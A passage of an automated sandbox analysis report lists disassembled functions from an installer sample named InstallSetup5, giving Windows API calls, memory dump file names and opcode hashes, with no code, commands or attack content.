                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                              • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                              • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                                                                                              • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                                                                                              • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                                                                                                                                              • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                                                                                              • Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                                                                                                                                              • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                              • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                                                                                              • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                              • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                              • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                                                                                              • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                              • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                              • String ID: $M$N
                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                              • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                              • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                                              • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                              • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                                              • DestroyWindow.USER32 ref: 00404072
                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                                              • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                                              • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1860320154-0
                                                                                                                                                              • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                              • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                                                                                              • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                              • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                              • String ID: N
                                                                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                                                                              • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                              • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                                              • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                              • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                              • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                              • String ID: F
                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                              • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                              • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                                                                                              • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                              • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                                              • wsprintfA.USER32 ref: 0040621C
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                                                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                                                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                                              • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                                              • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                                                                                              • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
